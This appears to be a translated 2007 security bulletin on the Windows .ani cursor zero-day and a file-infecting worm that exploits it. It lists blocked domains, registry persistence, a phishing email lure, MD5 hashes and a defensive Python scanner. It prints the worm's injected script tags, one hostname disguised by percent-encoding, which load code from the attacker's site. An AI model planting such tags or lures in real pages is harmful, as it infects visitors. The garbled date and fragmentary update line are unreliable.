A compound worm exploiting the animated-cursor vulnerability has appeared; the Vista operating system reveals its first major vulnerability.

Source: Internet
Author: User

On July 6, March 30, the Microsoft Vista operating system revealed its first major vulnerability. Yesterday, Rising anti-virus experts found that the vulnerability is already being exploited by hackers: users of Windows Vista and XP are infected by viruses and Trojan horses when they visit websites carrying the malicious files. According to monitoring, nearly 10 websites in China have already been compromised by hackers.

Microsoft has warned that attackers are actively exploiting an unpatched vulnerability in the handling of Windows animated cursor (.ani) files. The vulnerability affects Windows XP and later operating systems, and IE6 and later browsers; Microsoft's latest Vista and IE7 are not spared. Microsoft has not yet released a patch for this vulnerability.

According to Rising security experts, an ANI file is a Windows animated mouse cursor file. Because Vista and other Windows systems have a vulnerability in processing ANI files, hackers can construct a specially formatted ANI file; when a user browses a web page containing the file, or opens the file, the user's machine automatically downloads the viruses, Trojans and backdoor programs specified by the hacker. Among the viruses currently exploiting this vulnerability, the Worm.Viking variant and Trojans that steal online-game credentials account for the majority.

This is the first time Vista has been exposed to a major vulnerability. The number of websites exploiting this vulnerability to spread viruses is gradually increasing, and the attack code is likely to be published soon.

Security experts advise ordinary Internet users not to casually visit unfamiliar websites, especially links sent via email or chat software. Website administrators should strengthen the management of server logs and, in particular, pay attention to image files in formats such as ANI and JPG from unknown sources; once anomalies are found, they should be handled as soon as possible.

------------------ C. I. S. R. T. Information ------------------

Very bad news: a new worm exploiting the Microsoft animated cursor vulnerability has appeared, and we have received related samples. Our analysis confirms that this is a compound worm: it has a file-infection function similar to pandatv, downloads other viruses, sends emails pointing to a website that hosts the latest .ani exploit, and infects HTML and other files by inserting the URL of the latest exploit. Because of the high level of risk, CISRT Lab has decided to issue a moderate risk alert again, reminding all users to be vigilant!

At the same time, we recommend that users and CEN block the following two domain names and IP address:

2007ip.com
Microfsot.com
61.153.247.76

The worm sample is about 13 KB in size and drops itself to the following path:

%SYSTEM%\sysload3.exe

It adds the following registry value so that it runs at logon:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"System Boot Check" = "%SYSTEM%\sysload3.exe"

It sends an email of the following form:

From: I_love_cq@sohu.com
Subject: Who were you taken when you were playing the video? Laugh at you!
Body:
Look at how you look! I think you are famous!
Look at this address! Your face is so clear! You have become a star!
http://macr.microfsot.com/<removed>/134952.htm

It infects .HTML, .ASPX, .HTM, .PHP, .JSP, .ASP and .EXE files, and inserts the following code into the .HTML, .ASPX, .HTM, .PHP, .JSP and .ASP files:

<script src=http://macr.microfsot.com/<removed>.js></script>
or
<script language="javascript" src="http://%6D%61%63%72%2E%6D%69%63%72%6F%66%73%6F%74%2E%63%6F%6D/<removed>.js"></script>

Note that both the email and the injected web page link to malicious files exploiting the .ani 0-day vulnerability; the percent-encoded form of the second script tag decodes to the same macr.microfsot.com host as the first.
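A defender-side check for the injection described above, written here as an added example (not CISRT's or the page's own code): it scans HTML for script tags whose src hostname, after percent-decoding as in the second variant, falls under the domains named in the alert. The sample page and the file name x.js are constructed for the demonstration.

```python
"""Scan HTML for injected <script src=...> tags pointing at blocked hosts.

Added example, not CISRT's code. Blocked domains are from the alert;
the sample page below is constructed.
"""
import re
from urllib.parse import unquote, urlsplit

# Domains from the alert; subdomains such as macr.microfsot.com also match.
BLOCKED_DOMAINS = {"microfsot.com", "2007ip.com"}

# Case-insensitive <script ... src=VALUE ...> with quoted or bare value.
SCRIPT_SRC_RE = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE,
)

def normalize_host(src: str) -> str:
    """Percent-decode the URL (defeats the %6D%61... obfuscation), then
    return its lowercase hostname ("" for relative URLs)."""
    decoded = unquote(src.strip())
    return (urlsplit(decoded).hostname or "").lower()

def is_blocked(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)

def find_injected_scripts(html: str) -> list[str]:
    """Return the decoded hostnames of script tags that load from a
    blocked domain, one entry per offending tag."""
    hits = []
    for m in SCRIPT_SRC_RE.finditer(html):
        src = next(g for g in m.groups() if g is not None)
        host = normalize_host(src)
        if is_blocked(host):
            hits.append(host)
    return hits

# Constructed sample: both injection forms from the alert plus a
# legitimate local script that must not be flagged.
SAMPLE_HTML = """<html><body>
<script src=/js/site.js></script>
<script src=http://macr.microfsot.com/x.js></script>
<script language="javascript" src="http://%6D%61%63%72%2E%6D%69%63%72%6F%66%73%6F%74%2E%63%6F%6D/x.js"></script>
</body></html>"""

if __name__ == "__main__":
    for h in find_injected_scripts(SAMPLE_HTML):
        print("injected script from blocked host:", h)
```

Run it over the web root's .html/.htm/.asp/.aspx/.php/.jsp files; any hit is a file the worm has modified.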

Kaspersky detects it as Trojan-Downloader.Win32.Agent.bky; Kingsoft Duba names it Worm.MyInfect.

The MD5 values of the samples received so far are:

99720c731d19512678d9594867024e7e
4ebca8337797302fc6003eb50dd6237d
e9100ce97a5b4fbd8857b25ffe2d7179

First Update:

The author expressed dissatisfaction with Kaspersky In Worms
